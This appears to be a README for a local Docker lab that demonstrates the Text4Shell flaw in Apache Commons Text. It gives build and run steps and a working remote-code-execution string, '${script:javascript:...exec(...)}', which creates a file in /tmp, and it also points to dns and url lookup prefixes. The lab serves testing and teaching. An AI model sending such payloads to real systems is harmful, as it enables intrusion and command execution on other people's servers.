Enable build support by adding .buildspec.yml
src Loading last commit info...

Install maven - maven-linux

  1. Maven install to create the fat jar
mvn clean install
  1. Docker build
docker build --tag=text4shell .
  1. Docker run
docker run -p 80:8080 text4shell
  1. Test the app
  1. Attack can be performed by passing a string “${prefix:name}” where the prefix is the aforementioned lookup:
${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}


  1. You can also try using dns or url prefixes.

  2. Get the container id

docker container ls
  1. Get into the app
docker exec -it <container_id> bash
  1. To check if above RCE was successful (You should see a file named foo created in the /tmp directory):
ls /tmp/
  1. To stop the container
docker container stop <container_id>
Please wait...
Page is in error, reload to recover